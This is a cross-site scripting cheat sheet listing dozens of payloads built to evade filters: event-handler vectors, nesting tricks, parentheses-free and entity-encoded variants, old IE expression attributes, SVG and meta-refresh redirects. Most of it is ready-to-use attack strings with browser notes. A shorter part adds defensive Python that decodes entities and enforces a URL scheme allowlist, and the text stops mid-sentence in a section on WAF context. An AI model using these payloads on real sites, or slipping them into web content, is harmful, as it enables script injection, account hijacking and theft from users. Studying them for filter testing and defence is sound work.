Event handlers

<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
Short payloads
<q/oncut=open()>
<q/oncut=alert(1)> // Useful in case of payload restrictions.

Nesting trick
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<body language=vbs onload=alert-1 // Works with IE8
<command onmouseover="x6Ax61x76x61x53x43x52x49x50x54x26x63x6Fx6Cx6Fx6Ex3Bx63x6Fx6Ex66x69x72x6Dx26x6Cx70x61x72x3Bx31x26x72x70x61x72x3B">Save</command> // Works with IE8
Parentheses filtered

<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw'=alertx281x29';
Expression attribute
<img style="xss:expression(alert(0))"> // Works upto IE7.
<div style="color:rgb(''x:expression(alert(1))"></div> // Works up to IE7.
<style>#test{x:expression(alert(/XSS/))}</style> // Works up to IE7
"location" attribute
<a onmouseover=location='javascript:alert(1)>click
<body onfocus="location='javascrpt:alert(1) >123

Other payloads

<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:u0061lert(1);"></g></svg> // By @secalert
<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> // By Mario
<svg><![CDATA[><image xlink:href="]]><img/src=xx:x onerror=alert(2)//"</svg> // By @secalert
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed
( ) ; : filtered
<svg><script>alert&#40/1/&#41</script> // Works with all browsers
( is HTML-encoded as &#40
) is HTML-encoded as &#41

Opera variant
<svg><script>alert&#40 1&#41 // Works with Opera only
Entity decoding
&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
<a href="j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>
Encoding
JavaScript is a very flexible language: values can be encoded in hexadecimal, Unicode, HTML entities and so on. The values of the following attributes are decoded by the browser before use (HTML entities, octal, decimal, hexadecimal and Unicode are all supported):

href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
data= // base64 only
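The practical consequence of the list above (and of the event-handler section earlier) is that a filter must look at the value the browser will see, not the raw string. The following Python is an added defensive example, not code from the original cheat sheet: it decodes entities in a URL-valued attribute, strips the whitespace a browser ignores inside a scheme, and enforces a scheme allowlist; the attribute list, the allowed schemes and the function names are assumptions for this illustration.

```python
import html
import re

# Attributes the cheat sheet lists as URL-valued and decoded by the browser (assumed set).
URL_ATTRS = {"href", "src", "action", "formaction", "background", "poster", "data", "code"}
# Schemes permitted in those attributes; allowlist, so anything else is rejected (assumed).
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# ASCII whitespace and control characters that browsers skip while reading a scheme.
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")


def normalize_url_attr(value: str) -> str:
    """Decode HTML entities (named, decimal &#NN; and hex &#xNN;) until nothing
    changes, then drop the whitespace/controls ignored inside a scheme.
    Browsers decode once; decoding to a fixpoint is deliberately conservative."""
    decoded = value
    for _ in range(5):
        nxt = html.unescape(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return _CTRL_WS.sub("", decoded)

def url_scheme(value: str) -> str:
    """Lower-cased scheme of the normalized value, or '' for a relative URL."""
    m = re.match(r"^([a-z][a-z0-9+.\-]*):", normalize_url_attr(value).lower())
    return m.group(1) if m else ""

def is_safe_url_attr(value: str) -> bool:
    scheme = url_scheme(value)
    return scheme == "" or scheme in ALLOWED_SCHEMES

def naive_blacklist_blocks(value: str) -> bool:
    """Raw-string check of the kind a blacklist rule applies; shown for contrast."""
    return "javascript:" in value.lower()

def unsafe_attributes(attrs: dict) -> list:
    """Attribute names that must be stripped: every on* handler, plus any
    URL-valued attribute whose normalized scheme is not on the allowlist."""
    bad = []
    for name, value in attrs.items():
        lname = name.lower()
        if lname.startswith("on"):
            bad.append(name)
        elif lname in URL_ATTRS and not is_safe_url_attr(value):
            bad.append(name)
    return bad
```

Run against the entity-encoded forms shown earlier on this page, `naive_blacklist_blocks` misses `javascript&colon;alert(1)` while `is_safe_url_attr` rejects it.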

Context-based filtering
The big problem with a WAF is that it does not understand context: a blacklist can block standalone JavaScript, but it still does not give adequate protection against XSS. Suppose a reflected XSS has the following form